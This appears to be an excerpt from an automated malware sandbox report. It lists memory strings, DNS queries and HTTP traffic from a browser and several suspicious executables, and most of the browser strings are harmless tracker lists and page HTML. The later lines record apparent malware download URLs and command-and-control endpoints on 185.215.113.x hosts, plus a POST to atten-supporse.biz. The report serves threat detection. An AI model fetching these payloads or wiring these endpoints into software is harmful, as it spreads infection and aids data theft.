"*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B710000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2800920930.000002BA56B76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000018.00000002.2800920930.000002BA56B76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B88F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2826478847.000002BA5A31B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B580000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B852000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61990000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/2
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/H
Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe61395d7f
Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exep
Source: ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752988072.0000000000C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exezC
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exezI
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exeb
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe_
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/z
Source: ae5cfd188c.exe, 00000007.00000003.2753332198.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.0000000001484000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/P
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001484000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.0000000001484000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.0000000001484000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/a
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php8
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/o
Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206Oz
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Local
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2915523016.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
Source: skotes.exe, 00000006.00000002.2915523016.00000000006D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3539001
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php95dA
Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2915523016.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php?
